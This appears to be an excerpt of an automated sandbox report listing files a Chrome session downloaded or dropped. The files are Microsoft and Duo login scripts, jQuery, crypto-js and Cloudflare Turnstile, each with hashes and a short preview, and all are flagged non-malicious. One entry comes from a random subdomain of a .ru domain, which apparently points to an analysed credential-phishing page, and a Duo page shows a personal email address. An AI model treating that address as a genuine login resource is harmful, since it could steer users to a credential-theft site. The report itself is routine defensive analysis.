                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (32009)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):57443
                                                                                                                                          Entropy (8bit):5.372940573746363
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:ABqF1tlfretkF7IKbVaqDRx3D7ym+d/Px25+1wtvGixn/TPRUbx3VDg/MvA5Gl:ABrkF7IyJz7ym+d/Po5+1wtvGiJig/Ml
                                                                                                                                          MD5:D580777BB3A28B94F6F1D18EE17AEDA3
                                                                                                                                          SHA1:E78833A2DB1AA97DA3F4A1994E6AF1F0D74D7CC7
                                                                                                                                          SHA-256:81188E8A76162C79DB4A5C10AC933C9E874C5B9EAE10E47956AD9DF704E01B28
                                                                                                                                          SHA-512:E3F5FFE3E7E54A7D640DF3BC06D336C9F936635D2594159B3EA5EDAEFBA6D6774060A532E0CBE0664FDC65806BD53E9BFC19C11F7946A5E157A9EC935C564378
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:!function(e){function o(n){if(i[n])return i[n].exports;var t=i[n]={exports:{},id:n,loaded:!1};return e[n].call(t.exports,t,t.exports,o),t.loaded=!0,t.exports}var i={};return o.m=e,o.c=i,o.p="",o(0)}([function(e,o,i){i(2);var n=i(1),t=i(5),r=i(6),a=r.StringsVariantId,s=r.AllowedIdentitiesType;n.registerSource("str",function(e,o){if(e.WF_STR_SignupLink_AriaLabel_Text="Create a Microsoft account",e.WF_STR_SignupLink_AriaLabel_Generic_Text="Create a new account",e.CT_STR_CookieBanner_Link_AriaLabel="Learn more about Microsoft's Cookie Policy",e.WF_STR_HeaderDefault_Title=o.iLoginStringsVariantId===a.CombinedSigninSignupV2WelcomeTitle?"Welcome":"Sign in",e.STR_Footer_IcpLicense_Text=".ICP.13015306.-10",o.oAppCobranding&&o.oAppCobranding.friendlyAppName){var i=o.fBreakBrandingSigninString?"to continue to {0}":"Continue to {0}";e.WF_STR_App_Title=t.format(i,o.oAppCobranding.friendlyAppName)}switch(o.oAppCobranding&&o.oAppCobranding.signinDescription&&(e.WF_STR_Default_Desc=o.oAppCobrand
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):89501
                                                                                                                                          Entropy (8bit):5.289893677458563
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://cisco.login.duosecurity.com/static/shared/lib/jquery/jquery.min.js?v=ff152
                                                                                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):190152
                                                                                                                                          Entropy (8bit):5.348678574819375
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:0+mTq9mTuZEOHEXp6WXWkYVlMBMwMlJNbdffVv6GhL+rUWxa:STekBWkYVdLlJNbr6m+rUGa
                                                                                                                                          MD5:4877EFC88055D60953886EC55B04DE34
                                                                                                                                          SHA1:2341B026A3E2A3B01AFA1A39D1706840D75E09B3
                                                                                                                                          SHA-256:8405362EB8F09DF13AE244DE155B51B1577274673D9728B6C81CD0278A63C8B0
                                                                                                                                          SHA-512:625844EDC37594D5C2F7622BD1B59278BF68ABB2FA22476C56826433C961C7B1924858A7588F8B6284D3C5AC8738ECB895EEC949DE18667A98C04A59CB03DAC0
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://aadcdn.msftauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                                                                                                          Preview:(window.telemetry_webpackJsonp=window.telemetry_webpackJsonp||[]).push([[2],[,,,function(e,t,n){"use strict";n.r(t),n.d(t,"ValueKind",(function(){return r.e})),n.d(t,"EventLatency",(function(){return r.a})),n.d(t,"EventPersistence",(function(){return r.b})),n.d(t,"TraceLevel",(function(){return r.d})),n.d(t,"AppInsightsCore",(function(){return i.a})),n.d(t,"BaseCore",(function(){return d})),n.d(t,"_ExtendedInternalMessageId",(function(){return r.f})),n.d(t,"EventPropertyType",(function(){return r.c})),n.d(t,"ESPromise",(function(){return g})),n.d(t,"ESPromiseScheduler",(function(){return C})),n.d(t,"ValueSanitizer",(function(){return I})),n.d(t,"NotificationManager",(function(){return E.a})),n.d(t,"BaseTelemetryPlugin",(function(){return S.a})),n.d(t,"ProcessTelemetryContext",(function(){return N.a})),n.d(t,"MinChannelPriorty",(function(){return w.a})),n.d(t,"EventsDiscardedReason",(function(){return P.a})),n.d(t,"DiagnosticLogger",(function(){return c.a})),n.d(t,"LoggingSeverity",(fun
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (45797)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):406986
                                                                                                                                          Entropy (8bit):5.31836569617146
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:f5+ROkZBKxn7oW/sKni2JcPwRTQx4J77m7mBdhh2uZifxOjrCpaLmnF:uOkWxp/Fi9Nxe7maZc7F
                                                                                                                                          MD5:E40761677762EAB0692F86B259C7D744
                                                                                                                                          SHA1:34A9B50CEC6E1163CEEFCD4D394DB6524C89A854
                                                                                                                                          SHA-256:DA4A8DF0C326292B5BEE9C732B3C962FD67AAF2F99D850F1BF65068D573C5619
                                                                                                                                          SHA-512:04FA1D6074AD24E3ABAB53D1DE116A6B39B4BE3DFABC082427F1C5A169E50527561F160CC133C2AC4AEDC4E7AC404572F60E531A4618111EA74D138B2B0DD034
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[8],Array(533).concat([f
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):1929
                                                                                                                                          Entropy (8bit):5.60083860097694
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:lmIzzApNEerJWKBiUbErTVITVleIV4UL3QibqZ3sVj:1zzA3lrJWKBiS4YXXe4gTZ3sV
                                                                                                                                          MD5:EDCC93C6BBE8B359E9FCE52B3765FB60
                                                                                                                                          SHA1:E9AD3807D9A1FB50CAACC5745D49FB137A142412
                                                                                                                                          SHA-256:1D8FA54A4DEE2A6D8B6860D4349FDA322997BD08558DC683E97661149567005C
                                                                                                                                          SHA-512:00A8AD3004D7BCAEC9D5EC8495F57849535F6B24480B9D7D7A0A1A28AAAD375207AB13AEAD10A224FADBAC078ED5DFEA848C2CD1E2D07FFBAF3B9EC8E456F8AC
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://cisco.login.duosecurity.com/email_first?authkey=ASKAWA9H1311GU747SH0&scid=4873fe428ab243529767cba103466e46&edit=True
                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">.<head>.<title>Login</title>.<meta charset="utf-8" />.<meta name="viewport" content="width=device-width, initial-scale=1">.<link rel="stylesheet" href="&#x2f;static&#x2f;css&#x2f;page&#x2f;email-first.css&#x3f;v&#x3d;8132c">.<link rel="shortcut icon" href="&#x2f;static&#x2f;images&#x2f;favicon_duo.ico&#x3f;v&#x3d;e3716" />.</head>.<body>.<div.id="login-parent".data-authkey="ASJQ5AAHP5ZU7DK6SW4W".data-custom-accent-color="&#x23;155CDE".data-custom-background="".data-custom-background-color="&#x23;E7E9ED".data-custom-logo-url="https&#x3a;&#x2f;&#x2f;ux-asset-commercial.duosecurity.com&#x2f;customization&#x2f;account&#x2f;pjr5mk7gIVVM96clMnJeaB_2v7s7l9mi0IW7F6yfzFw&#x2f;logo_image.png&#x3f;versionId&#x3d;DzI1NMCJNJv6J3By1BhKLYgM8B5W6KuR".data-custom-username-label="".data-email-first-username="peter.smith&#x40;cisco.com".data-phishing-pro
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):61
                                                                                                                                          Entropy (8bit):3.990210155325004
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (64616)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):449972
                                                                                                                                          Entropy (8bit):5.4486277762255035
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:c7PuGBhXlRK2d/ZkpZYRsmA2pmBe9OpRUS4cEHKE0H3NX446:c7DBZkp6umhpsUSuN
                                                                                                                                          MD5:2330EDFA5D02BA27B4818454A04935E7
                                                                                                                                          SHA1:405CDD0091FA7D25CE504F71086F488A6193BBD2
                                                                                                                                          SHA-256:6379D57694ECB499626F889744FB47D1979DDE32C9F95BCAF48E318642A8C292
                                                                                                                                          SHA-512:895E0ABAFD9444621E421EEEA49C722DFC4590765F7E76C1CFD38ADFA9430F03BBFEA23A37FDF8D8536DBA54ACDF315EF40224FB3D77836531016A341BC9B3D7
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://aadcdn.msftauth.net/shared/1.0/content/js/ConvergedLogin_PCore_IzDt-l0Cuie0gYRUoEk15w2.js
                                                                                                                                          Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function n(n){for(var t,i,o=n[0],r=n[1],s=0,c=[];s<o.length;s++)
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (2003)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2976
                                                                                                                                          Entropy (8bit):5.331937284769462
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:vxVPjDltOMSBkjGWfT58STi1srOGM4xufaJ7mevwxnjs2XQamsJoXk+Ax42CcuKq:jPjDXOMS1WfDi1Z40faJ7mevwxnjXg73
                                                                                                                                          MD5:AF91917885AAE55D96914A09AB4F6E68
                                                                                                                                          SHA1:D3E84133F4445404DB6F3133C4568A7AC1F7B58D
                                                                                                                                          SHA-256:EE23DA6E558D1AE67B072B921BB57E2C49DE10DCF6F1A6F7E1D9146DDAE5BAAB
                                                                                                                                          SHA-512:86630D55789E4B7146E25044C4CC95CE817B3084A8A0F14FFF98BCEBABED42D2D871F74A20B7B752CB27FEAC9CC6F1CBA752BDCB368D0F0750239ED507031F32
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[20],{508:function(e,t,i
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (14782)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):15755
                                                                                                                                          Entropy (8bit):5.366543080044668
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:DveX/4OSgcn2ZU2ZfeXOh+rF3X1qDZD4zfXdv79HU:q/9i57hU
                                                                                                                                          MD5:630831903F4BA9060856520624E34CFC
                                                                                                                                          SHA1:36DC15B9CCC3FC8EF627354BF55EF44EBD10E203
                                                                                                                                          SHA-256:BC6804D058D5BD5B24FC04E479FC8973BEF5D3EFEAFAA9C19C60A009BF0FAC0B
                                                                                                                                          SHA-512:1B0759972BBAB0B1A11D54849051E6782600B74FADB1CAF1BD58D214F484E35154907CA7F396EDB1C81A7CDC6F264D138267FB58FD89E1BA3A4D67366EE7E8B0
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js
                                                                                                                                          Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[17],{519:function(e,n,s
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1864
                                                                                                                                          Entropy (8bit):5.222032823730197
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                                          MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                                          SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                                          SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                                          SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):1
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://jvzxo0nqcg4l1coovlpwctdcqgvywe8bgipczfymr9jhs03hab4hzwtc.birsbunh.ru/yhLPPHQxZfXkDAHXPFtWbCaEGFqyqLULWDEHCYEELIQZRNENRPHOMHUBA
                                                                                                                                          Preview:1
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):17174
                                                                                                                                          Entropy (8bit):2.9129715116732746
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (65473)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):887789
                                                                                                                                          Entropy (8bit):5.604484335646272
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:uDMw4MRO9CvDlJcIHI6k+MamMM2VKX8KQhesKU1XSTmzP2:I6eAMM2VKX8KQ8tU1XSTYu
                                                                                                                                          MD5:AF78A432536AFC7F965DAEB8389A7AF3
                                                                                                                                          SHA1:AC7F7D2759037C67CDB29FCD2F34F99CD533BB19
                                                                                                                                          SHA-256:0F15CE2743F157F1F1D94CA57D2681EC184501CD2D9078FFE90B6DA946C6FB92
                                                                                                                                          SHA-512:C479404F94F86E78BDEB66AF7FE5CA2E62560F448452A58DB56873C36ACE3B2503406B189F00D3D4979268568FFD1238FC4C016FCB7D33C0C9134BAB4876B68C
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://cisco.login.duosecurity.com/static/js/page/login.js?v=0f15c
                                                                                                                                          Preview:/*! For license information please see login.js.LICENSE.txt */.!function(){var __webpack_modules__={8865:function(__unused_webpack_module,exports,__webpack_require__){"use strict";__webpack_require__(9129),__webpack_require__(4910),__webpack_require__(3370),__webpack_require__(8815),__webpack_require__(7875),__webpack_require__(8543),__webpack_require__(7313),__webpack_require__(175),__webpack_require__(2698),__webpack_require__(3629),__webpack_require__(8039),__webpack_require__(2203),__webpack_require__(6312),__webpack_require__(9372),__webpack_require__(1661),__webpack_require__(8250),__webpack_require__(2692),__webpack_require__(9317),__webpack_require__(2856),__webpack_require__(5667),__webpack_require__(8463),__webpack_require__(3459),__webpack_require__(9e3),__webpack_require__(8866),__webpack_require__(9607),__webpack_require__(7709),__webpack_require__(6679),__webpack_require__(458),__webpack_require__(1893),__webpack_require__(7793),__webpack_require__(4432),__webpack_require
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):48316
                                                                                                                                          Entropy (8bit):5.6346993394709
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (47671)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):47672
                                                                                                                                          Entropy (8bit):5.401921124762015
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:OeCtueCACDHsEW8tZunqu5TTfjdTdWm54gEnih4A2WibLXKUEn+V1Kgbdfi0Vdua:OvXmHFW8tZuquNP54VnKJ3UEsnpj
                                                                                                                                          MD5:B804BCD42117B1BBE45326212AF85105
                                                                                                                                          SHA1:7B4175AAF0B7E45E03390F50CB8ED93185017014
                                                                                                                                          SHA-256:B7595C3D2E94DF7416308FA2CCF5AE8832137C76D2E9A8B02E6ED2CB2D92E2F7
                                                                                                                                          SHA-512:9A4F038F9010DDCCF5E0FAF97102465EF7BA27B33F55C4B86D167C41096DB1E76C8212A5E36565F0447C4F57340A10DB07BB9AE26982DFFF92C411B5B1F1FB97
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://challenges.cloudflare.com/turnstile/v0/b/22755d9a86c9/api.js
                                                                                                                                          Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):100
                                                                                                                                          Entropy (8bit):5.163563380781245
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:6iSNDrMTbTX7yYu1Wu+u8f3DIrY:6LB4TbTX7yYucucf3DIM
                                                                                                                                          MD5:48BEA5CA19B889BCA7E761CD3C3E16CD
                                                                                                                                          SHA1:76F30C75EA4AB9DE950831768F244CA2C57BAF27
                                                                                                                                          SHA-256:EDEBBAB1A62836AF2C907F8DE3066D8EBDC42AA29BAAB0ACCA78CB4F401501E6
                                                                                                                                          SHA-512:3A265EE7C7839B5DCFC0591E64DE696066BBE0898F8F25B4B9E997D6C229147FC3DE570CB9387941E8FDCA75011D0EB1C3C8D43499B888C010400E94EEC84B55
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
